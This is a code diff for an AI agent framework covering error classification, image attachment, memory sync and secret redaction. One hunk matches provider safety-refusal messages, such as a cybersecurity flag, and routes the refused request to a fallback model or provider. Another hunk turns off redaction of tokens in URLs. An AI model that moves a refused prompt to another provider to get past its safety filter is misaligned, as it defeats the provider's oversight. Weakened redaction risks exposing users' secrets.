@@ -281,6 +290,45 @@ _PROVIDER_POLICY_BLOCKED_PATTERNS = [
"no endpoints found matching your data policy",
]
# Provider content-policy / safety-filter blocks. Distinct from
# ``provider_policy_blocked`` above (which is an OpenRouter *account*-level
# data/privacy guardrail) — these are *per-prompt* safety decisions made by
# the upstream model provider. They are deterministic for the unchanged
# request, so retrying the same prompt three times just reproduces the same
# block and burns paid attempts on a refusal. The recovery is to switch to a
# configured fallback model/provider immediately, or surface the block to
# the user with actionable guidance if no fallback exists.
#
# Patterns are intentionally narrow — each phrase is a verbatim string from
# a specific provider's safety pipeline, not a generic word like "policy" or
# "violation" that could collide with billing/auth/format errors:
# • OpenAI Codex cybersecurity refusal (gpt-5.5, the case from #18028)
# • OpenAI moderation refusal ("violates our usage policies", with
# "usage policies" disambiguating from billing's "exceeded ... policy")
# • Anthropic safety refusal ("prompt was flagged by ... safety system")
# • OpenAI Responses content filter
_CONTENT_POLICY_BLOCKED_PATTERNS = [
# OpenAI Codex (#18028) — message may arrive without an HTTP status
"flagged for possible cybersecurity risk",
"trusted access for cyber",
# OpenAI moderation — chat completions / responses
"violates our usage policies",
"violates openai's usage policies",
"your request was flagged by",
# Anthropic safety system
"prompt was flagged by our safety",
"responses cannot be generated due to safety",
# Generic content-filter wording seen on Azure / OpenAI Responses.
# ``content_filter`` (underscore) is the OpenAI-standard error/finish
# token surfaced verbatim by their SDKs when a request is blocked.
# ``responsibleaipolicyviolation`` is Azure OpenAI's error code.
# Deliberately NOT matching the space variant ("content filter") — it
# appears in benign config descriptions and tooltip text that providers
# echo back; the underscore form is provider-specific enough.
"content_filter",
"responsibleaipolicyviolation",
]
# Auth patterns (non-status-code signals)
_AUTH_PATTERNS = [
"invalid api key",
@@ -484,6 +532,20 @@ def classify_api_error(
# ── 1. Provider-specific patterns (highest priority) ────────────
# Provider content-policy / safety-filter block. The provider has made a
# deterministic refusal decision about THIS prompt — retrying unchanged
# just reproduces the same refusal and burns paid attempts. Must run
# before status-based classification so a 400 safety block isn't
# downgraded to a generic ``format_error`` and a status-less block
# (OpenAI Codex SDK can raise without one) isn't left in the retryable
# ``unknown`` bucket. See issue #18028.
if any(p in error_msg for p in _CONTENT_POLICY_BLOCKED_PATTERNS):
return _result(
FailoverReason.content_policy_blocked,
retryable=False,
should_fallback=True,
)
# Anthropic thinking block signature invalid (400).
# Don't gate on provider — OpenRouter proxies Anthropic errors, so the
# provider may be "openrouter" even though the error is Anthropic-specific.
@@ -689,8 +751,13 @@ def _classify_by_status(
)
if status_code == 403:
# OpenRouter 403 "key limit exceeded" is actually billing
if "key limit exceeded" in error_msg or "spending limit" in error_msg:
# OpenRouter 403 "key limit exceeded" is actually billing. Other
# providers also use 403 for account-plan or credit exhaustion.
if (
"key limit exceeded" in error_msg
or "spending limit" in error_msg
or any(p in error_msg for p in _BILLING_PATTERNS)
):
return result_fn(
FailoverReason.billing,
retryable=False,
@@ -707,6 +774,17 @@ def _classify_by_status(
return _classify_402(error_msg, result_fn)
if status_code == 404:
# Nous API currently surfaces HA/NAS credit depletion as a paid model
# becoming unavailable on the Free Tier, returned as 404 rather than
# 402. Treat that as entitlement/billing exhaustion, not a missing
# model, so the retry loop can show credit/top-up guidance.
if any(p in error_msg for p in _BILLING_PATTERNS):
return result_fn(
FailoverReason.billing,
retryable=False,
should_rotate_credential=True,
should_fallback=True,
)
# OpenRouter policy-block 404 — distinct from "model not found".
# The model exists; the user's account privacy setting excludes the
# only endpoint serving it. Falling back to another provider won't
@@ -865,6 +943,26 @@ def _classify_400(
retryable=True,
)
# Invalid encrypted reasoning replay blob (OpenAI Responses API). Must be
# checked BEFORE context_overflow because some surfaces emit messages that
# contain context-like phrasing ("encrypted content … could not be
# verified") which could otherwise trip the context_overflow heuristics.
# ``error_msg`` is lowercased upstream — match accordingly.
error_code_lower = (error_code or "").lower()
if (
error_code_lower == "invalid_encrypted_content"
or "invalid_encrypted_content" in error_msg
or (
"encrypted content for item" in error_msg
and "could not be verified" in error_msg
)
):
return result_fn(
FailoverReason.invalid_encrypted_content,
retryable=True,
should_fallback=False,
)
# Context overflow from 400
if any(p in error_msg for p in _CONTEXT_OVERFLOW_PATTERNS):
return result_fn(
@@ -952,7 +1050,15 @@ def _classify_by_error_code(
should_rotate_credential=True,
)
if code_lower in {"insufficient_quota", "billing_not_active", "payment_required"}:
if code_lower in {
"insufficient_quota",
"billing_not_active",
"payment_required",
"insufficient_credits",
"no_usable_credits",
"balance_depleted",
"model_not_supported_on_free_tier",
}:
return result_fn(
FailoverReason.billing,
retryable=False,
@@ -974,6 +1080,13 @@ def _classify_by_error_code(
should_compress=True,
)
if code_lower == "invalid_encrypted_content":
return result_fn(
FailoverReason.invalid_encrypted_content,
retryable=True,
should_fallback=False,
)
return None
@@ -1141,15 +1254,49 @@ def _extract_error_code(body: dict) -> str:
"""Extract an error code string from the response body."""
if not body:
return ""
def _code_from_payload(payload) -> str:
"""Extract a code/type from a nested error payload dict (defensive)."""
if not isinstance(payload, dict):
return ""
payload_error = payload.get("error", {})
if isinstance(payload_error, dict):
nested = payload_error.get("code") or payload_error.get("type") or ""
if isinstance(nested, str) and nested.strip() and nested.strip() != "400":
return nested.strip()
code = payload.get("code") or payload.get("error_code") or ""
if isinstance(code, (str, int)):
text = str(code).strip()
if text and text != "400":
return text
return ""
error_obj = body.get("error", {})
if isinstance(error_obj, dict):
code = error_obj.get("code") or error_obj.get("type") or ""
if isinstance(code, str) and code.strip():
if isinstance(code, str) and code.strip() and code.strip() != "400":
return code.strip()
# Some providers wrap the real JSON error body as a string inside
# error.message — peek into it for a nested code (e.g. Responses API
# surfaces ``invalid_encrypted_content`` this way).
message = error_obj.get("message")
if isinstance(message, str) and message.strip().startswith("{"):
import json
try:
inner = json.loads(message)
except (json.JSONDecodeError, TypeError):
inner = None
nested_code = _code_from_payload(inner)
if nested_code:
return nested_code
# Top-level code
code = body.get("code") or body.get("error_code") or ""
if isinstance(code, (str, int)):
return str(code).strip()
text = str(code).strip()
if text and text != "400":
return text
return ""
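The `_extract_error_code` change above ignores a bare `"400"` code and peeks into a JSON document that some providers embed as a string in `error.message`. Below is a simplified, self-contained sketch of that lookup order. It uses recursion in place of the diff's `_code_from_payload` helper, so it is an illustration of the idea and not the exact implementation; the name `extract_error_code` and the sample payload are assumptions.

```python
import json
from typing import Any


def extract_error_code(body: Any) -> str:
    """Simplified sketch: find an error code, looking inside a JSON-encoded message."""
    if not isinstance(body, dict):
        return ""
    error_obj = body.get("error")
    if isinstance(error_obj, dict):
        code = error_obj.get("code") or error_obj.get("type") or ""
        # A bare "400" only repeats the HTTP status, so keep looking.
        if isinstance(code, str) and code.strip() and code.strip() != "400":
            return code.strip()
        # Some providers wrap the real error body as a JSON string in "message".
        message = error_obj.get("message")
        if isinstance(message, str) and message.strip().startswith("{"):
            try:
                inner = json.loads(message)
            except (json.JSONDecodeError, TypeError):
                inner = None
            nested = extract_error_code(inner)
            if nested:
                return nested
    # Fall back to a top-level code, again skipping a bare "400".
    code = body.get("code") or body.get("error_code") or ""
    if isinstance(code, (str, int)):
        text = str(code).strip()
        if text and text != "400":
            return text
    return ""


wrapped = {
    "error": {
        "code": "400",
        "message": '{"error": {"code": "invalid_encrypted_content"}}',
    }
}
print(extract_error_code(wrapped))
```

Skipping `"400"` matters because the classifier's code-based branch (for example the `invalid_encrypted_content` check) can only fire when the extracted code is the provider's semantic code and not an echo of the status.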
+1 -1
@@ -656,7 +656,7 @@ def get_valid_access_token(*, force_refresh: bool = False) -> str:
creds = load_credentials()
if creds is None:
raise GoogleOAuthError(
"No Google OAuth credentials found. Run `hermes login --provider google-gemini-cli` first.",
"No Google OAuth credentials found. Run `hermes auth add google-gemini-cli` first.",
code="google_oauth_not_logged_in",
)
+134 -14
@@ -37,6 +37,8 @@ from __future__ import annotations
import base64
import logging
import mimetypes
import os
import re
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
@@ -46,6 +48,102 @@ logger = logging.getLogger(__name__)
_VALID_MODES = frozenset({"auto", "native", "text"})
# Image extensions used by extract_image_refs(). Kept tight on purpose — we
# only auto-attach things the model can actually see. Documents/archives are
# excluded because the gateway's broader extract_local_files() also routes
# them differently (send_document), and we don't want to attach a PDF as a
# vision part.
_IMAGE_EXTS = (
".png", ".jpg", ".jpeg", ".gif", ".webp", ".bmp", ".tiff", ".tif", ".heic",
)
_IMAGE_EXT_PATTERN = "|".join(e.lstrip(".") for e in _IMAGE_EXTS)
# Absolute / home-relative local image path. Matches the same shape gateway's
# extract_local_files() uses: anchors to ``~/`` or ``/``, ignores matches inside
# URLs (the ``(?<![/:\w.])`` lookbehind), and case-insensitive on the extension.
_LOCAL_IMAGE_PATH_RE = re.compile(
r"(?<![/:\w.])(?:~/|/)(?:[\w.\-]+/)*[\w.\-]+\.(?:" + _IMAGE_EXT_PATTERN + r")\b",
re.IGNORECASE,
)
# http(s) URL ending in an image extension (optionally followed by a
# query string). Case-insensitive on the extension. Strict ``http(s)://``
# scheme so we don't accidentally grab ``file://`` URLs or other shapes.
_IMAGE_URL_RE = re.compile(
r"https?://[^\s<>\"']+?\.(?:" + _IMAGE_EXT_PATTERN + r")(?:\?[^\s<>\"']*)?",
re.IGNORECASE,
)
def extract_image_refs(text: str) -> Tuple[List[str], List[str]]:
"""Scan free-form text for image references the model should see.
Returns ``(local_paths, urls)``:
* ``local_paths``: absolute (``/``) or home-relative (``~/``) paths
whose suffix is an image extension AND whose expanded form exists
on disk as a file. Order-preserving, deduplicated.
* ``urls``: ``http(s)://`` URLs whose path ends in an image
extension (a ``?query`` is allowed after the extension).
Order-preserving, deduplicated.
Matches inside fenced code blocks (``` ``` ```) and inline backticks
(`` `` ``) are skipped so that snippets pasted into a task body for
reference aren't mistaken for live attachments. This mirrors the
behaviour of ``gateway.platforms.base.BaseAdapter.extract_local_files``.
Local paths are validated against the filesystem; URLs are not
(the provider fetches them at request time).
"""
if not isinstance(text, str) or not text:
return [], []
# Build spans covered by fenced code blocks and inline code so we can
# ignore references the author embedded purely as example text.
code_spans: list[tuple[int, int]] = []
for m in re.finditer(r"```[^\n]*\n.*?```", text, re.DOTALL):
code_spans.append((m.start(), m.end()))
for m in re.finditer(r"`[^`\n]+`", text):
code_spans.append((m.start(), m.end()))
def _in_code(pos: int) -> bool:
return any(s <= pos < e for s, e in code_spans)
local_paths: list[str] = []
seen_paths: set[str] = set()
for match in _LOCAL_IMAGE_PATH_RE.finditer(text):
if _in_code(match.start()):
continue
raw = match.group(0)
expanded = os.path.expanduser(raw)
try:
if not os.path.isfile(expanded):
continue
except OSError:
# ENAMETOOLONG / EINVAL on pathological inputs — skip rather than crash.
continue
if expanded in seen_paths:
continue
seen_paths.add(expanded)
local_paths.append(expanded)
urls: list[str] = []
seen_urls: set[str] = set()
for match in _IMAGE_URL_RE.finditer(text):
if _in_code(match.start()):
continue
url = match.group(0)
# Strip trailing punctuation that's almost certainly prose, not part
# of the URL (e.g. "see https://x.com/a.png." or "/a.png)").
url = url.rstrip(".,;:!?)]>")
if url in seen_urls:
continue
seen_urls.add(url)
urls.append(url)
return local_paths, urls
# Strict YAML/JSON boolean coercion for capability overrides.
#
# ``bool("false")`` is True in Python because non-empty strings are truthy, so
@@ -320,20 +418,29 @@ def _file_to_data_url(path: Path) -> Optional[str]:
def build_native_content_parts(
user_text: str,
image_paths: List[str],
image_urls: Optional[List[str]] = None,
) -> Tuple[List[Dict[str, Any]], List[str]]:
"""Build an OpenAI-style ``content`` list for a user turn.
Shape:
[{"type": "text", "text": "...\\n\\n[Image attached at: /local/path]"},
{"type": "image_url", "image_url": {"url": "data:image/png;base64,..."}},
{"type": "image_url", "image_url": {"url": "https://example.com/a.png"}},
...]
The local path of each successfully attached image is appended to the
text part as ``[Image attached at: <path>]``. The model still sees the
pixels via the ``image_url`` part (full native vision); the path note
just gives it a string handle so MCP/skill tools that take an image
path or URL argument can be invoked on the same image without an
extra round-trip. This parallels the text-mode hint produced by
Local paths are read from disk and embedded as base64 ``data:`` URLs.
Remote URLs (``http(s)://``) are passed through verbatim; the provider
fetches them server-side. The model still sees the pixels either way.
For each successfully attached image, a hint is appended to the text
part:
* local path: ``[Image attached at: <path>]``
* URL: ``[Image attached: <url>]``
The hint gives the model a string handle so MCP/skill tools that take
an image path or URL argument can be invoked on the same image without
an extra round-trip. This parallels the text-mode hint produced by
``Runner._enrich_message_with_vision`` (``vision_analyze using image_url:
<path>``) so behaviour is consistent across both image input modes.
@@ -342,12 +449,14 @@ def build_native_content_parts(
ceiling), the agent's retry loop transparently shrinks and retries
once; see ``run_agent._try_shrink_image_parts_in_messages``.
Returns (content_parts, skipped_paths). Skipped paths are files that
couldn't be read from disk and are NOT advertised in the path hints.
Returns (content_parts, skipped). Skipped entries are local paths
that couldn't be read from disk; URLs are never skipped (they're
not validated here).
"""
skipped: List[str] = []
image_parts: List[Dict[str, Any]] = []
attached_paths: List[str] = []
attached_urls: List[str] = []
for raw_path in image_paths:
p = Path(raw_path)
@@ -364,16 +473,26 @@ def build_native_content_parts(
})
attached_paths.append(str(raw_path))
for url in image_urls or []:
url = (url or "").strip()
if not url:
continue
image_parts.append({
"type": "image_url",
"image_url": {"url": url},
})
attached_urls.append(url)
text = (user_text or "").strip()
# If at least one image attached, build a single text part that combines
# the user's caption (or a neutral default) with one path hint per image.
if attached_paths:
# the user's caption (or a neutral default) with one hint per image.
if attached_paths or attached_urls:
base_text = text or "What do you see in this image?"
path_hints = "\n".join(
f"[Image attached at: {p}]" for p in attached_paths
)
combined_text = f"{base_text}\n\n{path_hints}"
hint_lines: List[str] = []
hint_lines.extend(f"[Image attached at: {p}]" for p in attached_paths)
hint_lines.extend(f"[Image attached: {u}]" for u in attached_urls)
combined_text = f"{base_text}\n\n" + "\n".join(hint_lines)
parts: List[Dict[str, Any]] = [{"type": "text", "text": combined_text}]
parts.extend(image_parts)
return parts, skipped
@@ -388,4 +507,5 @@ def build_native_content_parts(
__all__ = [
"decide_image_input_mode",
"build_native_content_parts",
"extract_image_refs",
]
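To make the URL half of `extract_image_refs` concrete, here is a reduced sketch that reuses the URL pattern, the code-span skipping, and the trailing-punctuation strip from the diff above. It leaves out local-path handling so that it does not depend on the filesystem. The name `extract_image_urls`, the shortened extension list, and the sample URLs are assumptions made for illustration.

```python
import re
from typing import List

# Shortened extension list for the example; the diff's list is longer.
IMAGE_EXTS = ("png", "jpg", "jpeg", "gif", "webp")
IMAGE_URL_RE = re.compile(
    r"https?://[^\s<>\"']+?\.(?:" + "|".join(IMAGE_EXTS) + r")(?:\?[^\s<>\"']*)?",
    re.IGNORECASE,
)


def extract_image_urls(text: str) -> List[str]:
    """Return image URLs found in prose, skipping anything inside code spans."""
    # Spans covered by fenced code blocks and inline code.
    code_spans = [
        (m.start(), m.end())
        for m in re.finditer(r"```[^\n]*\n.*?```", text, re.DOTALL)
    ]
    code_spans += [(m.start(), m.end()) for m in re.finditer(r"`[^`\n]+`", text)]

    urls: List[str] = []
    seen = set()
    for match in IMAGE_URL_RE.finditer(text):
        if any(start <= match.start() < end for start, end in code_spans):
            continue
        # Trailing punctuation is treated as prose, not as part of the URL.
        url = match.group(0).rstrip(".,;:!?)]>")
        if url not in seen:
            seen.add(url)
            urls.append(url)
    return urls


sample = (
    "Compare https://example.com/a.png with https://example.com/b.JPG?size=large, "
    "but ignore `https://example.com/skipped.png` and https://example.com/page.html."
)
print(extract_image_urls(sample))
```

The URL inside backticks and the `.html` link are both left out, and the comma that follows the query string is stripped before deduplication.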
+39
@@ -0,0 +1,39 @@
"""Best-effort early import for the OpenAI SDK's native streaming parser.
The OpenAI SDK imports ``jiter`` while constructing streaming chat-completion
responses. On some Windows installs the native extension can be imported
directly from the Hermes venv, but the first import fails when it happens later
inside the threaded streaming request path. Loading it once during agent
package import avoids that import-order failure while preserving the normal
SDK error path for genuinely missing or broken installs.
"""
from __future__ import annotations
import importlib
_JITER_PRELOADED = False
_JITER_PRELOAD_ERROR: Exception | None = None
def preload_jiter_native_extension() -> bool:
"""Import jiter's native extension early if it is available."""
global _JITER_PRELOADED, _JITER_PRELOAD_ERROR
if _JITER_PRELOADED:
return True
try:
importlib.import_module("jiter.jiter")
from jiter import from_json as _from_json # noqa: F401
except Exception as exc:
_JITER_PRELOAD_ERROR = exc
return False
_JITER_PRELOADED = True
_JITER_PRELOAD_ERROR = None
return True
preload_jiter_native_extension()
+33 -2
@@ -368,11 +368,42 @@ class MemoryManager:
# -- Sync ----------------------------------------------------------------
def sync_all(self, user_content: str, assistant_content: str, *, session_id: str = "") -> None:
@staticmethod
def _provider_sync_accepts_messages(provider: MemoryProvider) -> bool:
"""Return whether sync_turn accepts a messages keyword."""
try:
signature = inspect.signature(provider.sync_turn)
except (TypeError, ValueError):
return True
params = list(signature.parameters.values())
if any(p.kind == inspect.Parameter.VAR_KEYWORD for p in params):
return True
return "messages" in signature.parameters
def sync_all(
self,
user_content: str,
assistant_content: str,
*,
session_id: str = "",
messages: Optional[List[Dict[str, Any]]] = None,
) -> None:
"""Sync a completed turn to all providers."""
for provider in self._providers:
try:
provider.sync_turn(user_content, assistant_content, session_id=session_id)
if messages is not None and self._provider_sync_accepts_messages(provider):
provider.sync_turn(
user_content,
assistant_content,
session_id=session_id,
messages=messages,
)
else:
provider.sync_turn(
user_content,
assistant_content,
session_id=session_id,
)
except Exception as e:
logger.warning(
"Memory provider '%s' sync_turn failed: %s",
+13 -1
@@ -78,6 +78,7 @@ class MemoryProvider(ABC):
- agent_workspace (str): Shared workspace name (e.g. "hermes").
- parent_session_id (str): For subagents, the parent's session_id.
- user_id (str): Platform user identifier (gateway sessions).
- user_id_alt (str): Optional alternate stable platform user identifier.
"""
def system_prompt_block(self) -> str:
@@ -111,11 +112,22 @@ class MemoryProvider(ABC):
that do background prefetching should override this.
"""
def sync_turn(self, user_content: str, assistant_content: str, *, session_id: str = "") -> None:
def sync_turn(
self,
user_content: str,
assistant_content: str,
*,
session_id: str = "",
messages: Optional[List[Dict[str, Any]]] = None,
) -> None:
"""Persist a completed turn to the backend.
Called after each turn. Should be non-blocking; queue for
background processing if the backend has latency.
``messages`` is the OpenAI-style conversation message list as of the
completed turn, including any assistant tool calls and tool results.
Providers that do not need raw turn context can ignore it.
"""
@abstractmethod
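The `sync_all` / `sync_turn` changes above keep older providers working by checking, via `inspect.signature`, whether a provider's `sync_turn` can take the new `messages` keyword before passing it. The sketch below isolates that check. The three provider classes are hypothetical examples, and `accepts_messages` is an illustrative name for the logic in `_provider_sync_accepts_messages`.

```python
import inspect
from typing import Any, Callable


def accepts_messages(sync_turn: Callable[..., Any]) -> bool:
    """Return True if the callable can be passed a ``messages`` keyword."""
    try:
        signature = inspect.signature(sync_turn)
    except (TypeError, ValueError):
        # Un-inspectable callables are assumed to accept it, as in the diff.
        return True
    params = signature.parameters.values()
    if any(p.kind == inspect.Parameter.VAR_KEYWORD for p in params):
        return True  # **kwargs swallows any keyword
    return "messages" in signature.parameters


class LegacyProvider:
    # Pre-change signature: no ``messages`` parameter.
    def sync_turn(self, user_content, assistant_content, *, session_id=""):
        return None


class ModernProvider:
    # Post-change signature: explicit ``messages`` keyword.
    def sync_turn(self, user_content, assistant_content, *, session_id="", messages=None):
        return None


class KwargsProvider:
    # Catch-all signature.
    def sync_turn(self, user_content, assistant_content, **kwargs):
        return None


for provider in (LegacyProvider(), ModernProvider(), KwargsProvider()):
    print(type(provider).__name__, accepts_messages(provider.sync_turn))
```

Checking the signature up front avoids calling a legacy provider with an unexpected keyword, which would raise `TypeError` and be logged as a sync failure by the `except Exception` handler.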
+26 -3
@@ -47,7 +47,7 @@ def _resolve_requests_verify() -> bool | str:
_PROVIDER_PREFIXES: frozenset[str] = frozenset({
"openrouter", "nous", "openai-codex", "copilot", "copilot-acp",
"gemini", "ollama-cloud", "zai", "kimi-coding", "kimi-coding-cn", "stepfun", "minimax", "minimax-oauth", "minimax-cn", "anthropic", "deepseek",
"opencode-zen", "opencode-go", "ai-gateway", "kilocode", "alibaba", "novita",
"opencode-zen", "opencode-go", "kilocode", "alibaba", "novita",
"qwen-oauth",
"xiaomi",
"arcee",
@@ -59,7 +59,7 @@ _PROVIDER_PREFIXES: frozenset[str] = frozenset({
"glm", "z-ai", "z.ai", "zhipu", "github", "github-copilot",
"github-models", "kimi", "moonshot", "kimi-cn", "moonshot-cn", "claude", "deep-seek",
"ollama",
"stepfun", "opencode", "zen", "go", "vercel", "kilo", "dashscope", "aliyun", "qwen",
"stepfun", "opencode", "zen", "go", "kilo", "dashscope", "aliyun", "qwen",
"mimo", "xiaomi-mimo",
"tencent", "tokenhub", "tencent-cloud", "tencentmaas",
"arcee-ai", "arceeai",
@@ -141,6 +141,8 @@ DEFAULT_CONTEXT_LENGTHS = {
# fuzzy-match collisions (e.g. "anthropic/claude-sonnet-4" is a
# substring of "anthropic/claude-sonnet-4.6").
# OpenRouter-prefixed models resolve via OpenRouter live API or models.dev.
"claude-opus-4-8": 1000000,
"claude-opus-4.8": 1000000,
"claude-opus-4-7": 1000000,
"claude-opus-4.7": 1000000,
"claude-opus-4-6": 1000000,
@@ -911,12 +913,33 @@ def parse_context_limit_from_error(error_msg: str) -> Optional[int]:
return None
def get_context_length_from_provider_error(
error_msg: str,
current_context_length: int,
) -> Optional[int]:
"""Return a provider-reported lower context limit, if one is present.
Context-overflow recovery must not invent a new model window size. Some
providers only say that the input exceeds the context window without
reporting the actual maximum. In that case callers should keep the
configured context length and try compression only, rather than stepping
down through guessed probe tiers (1M -> 256K -> 128K ...).
"""
parsed_limit = parse_context_limit_from_error(error_msg)
if parsed_limit is None:
return None
if parsed_limit < current_context_length:
return parsed_limit
return None
def parse_available_output_tokens_from_error(error_msg: str) -> Optional[int]:
"""Detect an "output cap too large" error and return how many output tokens are available.
Background: two distinct context errors exist.
1. "Prompt too long": the INPUT itself exceeds the context window.
Fix: compress history and/or halve context_length.
Fix: compress history, and only reduce context_length if the
provider explicitly reports the actual lower limit.
2. "max_tokens too large": input is fine, but input + requested_output > window.
Fix: reduce max_tokens (the output cap) for this call.
Do NOT touch context_length; the window hasn't shrunk.
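The rule in `get_context_length_from_provider_error` above (only shrink the context length when the provider states a smaller limit) can be illustrated in isolation. The diff does not show `parse_context_limit_from_error`, so `parse_limit` below is a hypothetical stand-in that recognises a single message shape. The error strings are made up for the example.

```python
import re
from typing import Optional


def parse_limit(error_msg: str) -> Optional[int]:
    """Hypothetical stand-in for parse_context_limit_from_error."""
    match = re.search(r"maximum context length is (\d+)", error_msg.lower())
    return int(match.group(1)) if match else None


def lower_limit_from_error(error_msg: str, current_context_length: int) -> Optional[int]:
    """Return the provider-reported limit only if it is below the current one."""
    parsed = parse_limit(error_msg)
    if parsed is not None and parsed < current_context_length:
        return parsed
    # No limit reported, or not lower: keep the configured length and
    # let the caller try compression only.
    return None


explicit = "This model's maximum context length is 131072 tokens."
vague = "Input exceeds the context window."

print(lower_limit_from_error(explicit, 1_000_000))
print(lower_limit_from_error(vague, 1_000_000))
```

Returning `None` for the vague message is what stops a caller from guessing a smaller window when the provider never reported one.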
-1
@@ -158,7 +158,6 @@ PROVIDER_TO_MODELS_DEV: Dict[str, str] = {
"alibaba": "alibaba",
"qwen-oauth": "alibaba",
"copilot": "github-copilot",
"ai-gateway": "vercel",
"opencode-zen": "opencode",
"opencode-go": "opencode-go",
"kilocode": "kilo",
+2 -3
@@ -610,7 +610,7 @@ WSL_ENVIRONMENT_HINT = (
# misleading — the agent should only see the machine it can actually touch.
_REMOTE_TERMINAL_BACKENDS = frozenset({
"docker", "singularity", "modal", "daytona", "ssh",
"vercel_sandbox", "managed_modal",
"managed_modal",
})
@@ -624,7 +624,6 @@ _BACKEND_FALLBACK_DESCRIPTIONS: dict[str, str] = {
"modal": "a Modal sandbox (Linux)",
"managed_modal": "a managed Modal sandbox (Linux)",
"daytona": "a Daytona workspace (Linux)",
"vercel_sandbox": "a Vercel sandbox (Linux)",
"ssh": "a remote host reached over SSH (likely Linux)",
}
@@ -738,7 +737,7 @@ def build_environment_hints() -> str:
and a Windows-only note that `terminal` shells out to bash, not
PowerShell).
- For **remote / sandbox** terminal backends (docker, singularity,
modal, daytona, ssh, vercel_sandbox): host info is **suppressed**
modal, daytona, ssh): host info is **suppressed**
because the agent's tools can't touch the host; only the backend
matters. A live probe inside the backend reports its OS, user, $HOME,
and cwd. Falls back to a static summary if the probe fails.
+8 -13
@@ -406,19 +406,14 @@ def redact_sensitive_text(text: str, *, force: bool = False, code_file: bool = F
if "eyJ" in text:
text = _JWT_RE.sub(lambda m: _mask_token(m.group(0)), text)
# URL userinfo (http(s)://user:pass@host) — redact for non-DB schemes.
# DB schemes are handled above by _DB_CONNSTR_RE.
if "://" in text:
text = _redact_url_userinfo(text)
# URL query params containing opaque tokens (?access_token=…&code=…)
if "?" in text:
text = _redact_url_query_params(text)
# HTTP access logs can contain relative request targets with query params
# and no URL scheme, e.g. `"POST /hook?password=... HTTP/1.1"`.
if "?" in text and "=" in text and _has_http_method_substring(text):
text = _redact_http_request_target_query_params(text)
# NOTE: Web-URL redaction (query params + userinfo + HTTP access-log
# request targets) is intentionally OFF. Many legitimate workflows pass
# opaque tokens through query strings — magic-link checkouts, OAuth
# callbacks the agent is meant to follow, pre-signed share URLs — and
# blanket-redacting param values by name breaks those skills mid-flow.
# Known credential shapes (sk-, ghp_, JWTs, etc.) inside URLs are still
# caught by _PREFIX_RE and _JWT_RE above. DB connection-string passwords
# are still caught by _DB_CONNSTR_RE.
# Form-urlencoded bodies (only triggers on clean k=v&k=v inputs).
if "&" in text and "=" in text:
+1 -1
@@ -258,7 +258,7 @@ def emit_stream_drop(
except Exception:
pass
try:
agent._emit_status(
agent._buffer_status(
f"⚠️ {provider} stream {kind} ({type(error).__name__}){_suffix} "
f"— reconnecting, retry {attempt}/{max_attempts}"
)
+48 -2
@@ -45,6 +45,15 @@ _COMMAND_TOOLS = {"terminal"}
# Prevents scanning all the way to / for deeply nested paths.
_MAX_ANCESTOR_WALK = 5
def _is_ancestor_or_same(a: Path, b: Path) -> bool:
"""Check if *a* is the same as or an ancestor of *b* (parent directory check)."""
try:
b.relative_to(a)
return True
except ValueError:
return False
class SubdirectoryHintTracker:
"""Track which directories the agent visits and load hints on first access.
@@ -158,7 +167,13 @@ class SubdirectoryHintTracker:
self._add_path_candidate(token, candidates)
def _is_valid_subdir(self, path: Path) -> bool:
"""Check if path is a valid directory to scan for hints."""
"""Check if path is a valid directory to scan for hints.
Only allow subdirectories within the working directory tree.
This prevents loading AGENTS.md from outside the active workspace
(e.g. ~/.codex/AGENTS.md, ~/.claude/CLAUDE.md), which causes
cross-agent context contamination and instruction mixup.
"""
try:
if not path.is_dir():
return False
@@ -166,12 +181,43 @@ class SubdirectoryHintTracker:
return False
if path in self._loaded_dirs:
return False
# Reject paths outside the working directory tree.
# path.resolve() may differ from working_dir.resolve() due to symlinks,
# but path.is_relative_to(working_dir) handles both absolute and
# symlinked paths correctly on Python 3.9+.
try:
if not path.is_relative_to(self.working_dir):
return False
except (AttributeError, OSError, ValueError):
# Older Python or path resolution error — fall back to parent
# check as a best-effort safeguard.
if not _is_ancestor_or_same(self.working_dir, path):
return False
return True
def _load_hints_for_directory(self, directory: Path) -> Optional[str]:
"""Load hint files from a directory. Returns formatted text or None."""
"""Load hint files from a directory. Returns formatted text or None.
Only loads hints from directories within the working directory tree.
"""
self._loaded_dirs.add(directory)
# Reject paths outside the working directory tree.
try:
if not directory.is_relative_to(self.working_dir):
logger.debug(
"Skipping hint files in %s — outside working_dir %s",
directory, self.working_dir,
)
return None
except (AttributeError, OSError, ValueError):
if not _is_ancestor_or_same(self.working_dir, directory):
logger.debug(
"Skipping hint files in %s — outside working_dir %s",
directory, self.working_dir,
)
return None
found_hints = []
for filename in _HINT_FILENAMES:
hint_path = directory / filename
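The workspace containment check in this hunk can be illustrated with a standalone sketch. It assumes both paths are resolved first, which is a design choice of this example and not necessarily what the code above does; `is_within` is a hypothetical helper name. Resolving matters because `Path.is_relative_to` and `Path.relative_to` compare path components lexically, so an unresolved `..` segment can make an outside path look like it is inside the workspace.

```python
from pathlib import Path


def is_within(root: Path, candidate: Path) -> bool:
    """Return True if candidate is root or lies beneath it (hypothetical helper).

    Both paths are resolved first so that ".." segments and symlinks are
    collapsed before the component-wise comparison.
    """
    root_resolved = root.resolve()
    candidate_resolved = candidate.resolve()
    try:
        # relative_to raises ValueError when candidate is not under root.
        candidate_resolved.relative_to(root_resolved)
        return True
    except ValueError:
        return False
```

Using `relative_to` with a `ValueError` guard also works on Python versions that predate `Path.is_relative_to`.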
+68 -4
@@ -17,16 +17,39 @@ class ResponsesApiTransport(ProviderTransport):
Wraps the functions extracted into codex_responses_adapter.py (PR 1).
"""
# Issuer kind of the most recent build_kwargs / convert_messages call.
# Used as a fallback when normalize_response is invoked without an
# explicit ``issuer_kind`` kwarg, so reasoning items captured from a
# response are stamped with the endpoint that minted them. Plain class
# attribute default; mutated on the instance, not the class.
_last_issuer_kind: Optional[str] = None
@property
def api_mode(self) -> str:
return "codex_responses"
def _resolve_issuer_kind(self, params: Dict[str, Any]) -> str:
"""Classify the current Responses endpoint from transport params."""
from agent.codex_responses_adapter import _classify_responses_issuer
return _classify_responses_issuer(
is_xai_responses=bool(params.get("is_xai_responses")),
is_github_responses=bool(params.get("is_github_responses")),
is_codex_backend=bool(params.get("is_codex_backend")),
base_url=params.get("base_url"),
)
def convert_messages(self, messages: List[Dict[str, Any]], **kwargs) -> Any:
"""Convert OpenAI chat messages to Responses API input items."""
from agent.codex_responses_adapter import _chat_messages_to_responses_input
issuer = self._resolve_issuer_kind(kwargs)
self._last_issuer_kind = issuer
return _chat_messages_to_responses_input(
messages,
